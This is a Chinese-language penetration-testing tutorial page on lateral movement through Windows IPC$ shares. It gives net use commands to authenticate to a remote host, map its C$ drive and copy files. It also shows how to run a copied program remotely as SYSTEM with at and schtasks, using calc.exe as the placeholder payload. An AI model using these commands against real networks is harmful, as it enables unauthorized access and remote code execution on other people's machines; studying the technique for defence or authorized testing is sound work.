5、横向移不动 - IPC的利用 - 《粗浅的内网渗透🥱》

1、IPC是什么？
IPC是经典的内网渗透的操作之一，其实它本身并不算是一个漏洞，它只是为了方便管理员远程管理而开放的远程网络登录功能，主要是为了让进程之间相互通信。一般情况下，IPC需要139端口或445端口来支持

2、基本操作：
IPC空连接：不需要账户和密码即为空连接

基本上没什么用,大部分都被阻止了

    IPC用户连接：输入正确的账户和密码，但会根据账户的权限有不同的反应<br />          net use \\192.168.49.131\IPC$ "password"  /user:"username"<br />        <br />            ![image.png](https://cdn.nlark.com/yuque/0/2020/png/1431765/1591284209353-6f598ddb-284f-4f13-a07c-d688afcceabd.png#height=158&id=Pg3oO&margin=%5Bobject%20Object%5D&name=image.png&originHeight=186&originWidth=775&originalType=binary&ratio=1&size=18707&status=done&style=none&width=658)<br />            ![image.png](https://cdn.nlark.com/yuque/0/2020/png/1431765/1591284221934-1e96ebe3-36b5-4deb-9213-1fd170b0082c.png#height=176&id=q9q1q&margin=%5Bobject%20Object%5D&name=image.png&originHeight=182&originWidth=564&originalType=binary&ratio=1&size=14557&status=done&style=none&width=546)
    将对方的C盘映射到本地的Z盘<br />       <br />net  use z:  \\192.168.49.131\c$<br />        ![image.png](https://cdn.nlark.com/yuque/0/2020/png/1431765/1591284250839-cdc9a46a-8849-426a-b2b1-87fef1411251.png#height=302&id=hWbS6&margin=%5Bobject%20Object%5D&name=image.png&originHeight=366&originWidth=588&originalType=binary&ratio=1&size=35738&status=done&style=none&width=485)
    复制东西到对端<br />        ![image.png](https://cdn.nlark.com/yuque/0/2020/png/1431765/1591284287044-f54ce3e3-b050-456d-a13f-65d90713eb04.png#height=324&id=k1bq0&margin=%5Bobject%20Object%5D&name=image.png&originHeight=401&originWidth=687&originalType=binary&ratio=1&size=63290&status=done&style=none&width=555)<br />一般可以复制东西到对方后然后使用计划任务运行此程序，<br />at     \\192.168.1.1 22:00  c:\\calc.exe<br />at     \\192.168.1.1 1 /delete

win7以及win2008以上
schtasks /create /s 192.168.1.1 /tn test /sc onstart /tr c:\calc.bat /ru system /f 添加计划任务
schtasks /run /s 192.168.1.1 /i /tn “test” 运行
schtasks /delete /s /192.168.1.1 /tn “test” 删除

    查看<br />        ![image.png](https://cdn.nlark.com/yuque/0/2020/png/1431765/1591284292468-63085ee7-43c8-4b9d-8712-cce38558fffd.png#height=91&id=t4cZn&margin=%5Bobject%20Object%5D&name=image.png&originHeight=93&originWidth=663&originalType=binary&ratio=1&size=7173&status=done&style=none&width=647)

删除IPC连接
net use * /del /y

在对方的电脑查看 net sessions